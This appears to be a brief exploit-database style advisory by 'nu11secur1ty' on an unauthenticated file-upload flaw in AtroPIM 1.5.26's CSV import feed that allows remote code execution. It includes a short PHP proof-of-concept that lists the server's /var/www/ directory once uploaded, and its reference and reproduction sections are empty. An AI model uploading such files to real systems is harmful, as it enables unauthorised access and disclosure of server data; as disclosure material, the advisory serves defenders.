atropim-1.5.26-Unauthenticated-File-Upload-RCE - Directory Traversal
Vendor
Description:
The Create Import Feed option with glyphicon-glyphicon-paperclip - format CSV upload function appears to be vulnerable to User interaction - Unauthenticated File upload - RCE attacks. The attacker can easily upload a malicious file then can execute the file remotely and can get VERY sensitive information about the configuration of this system, after this he can perform a very nasty attack.
STATUS: HIGH Vulnerability CRITICAL
[+]Exploit:
<?php
// by nu11secur1ty - 2023
$dir = "/var/www/";
$ascending_order = scandir($dir);
$descending_order = scandir($dir,1);
print_r($ascending_order);
print_r($descending_order);
?>Reproduce:
Reference:
Reference:
Proof and Exploit:
Time spend:
00:15:00
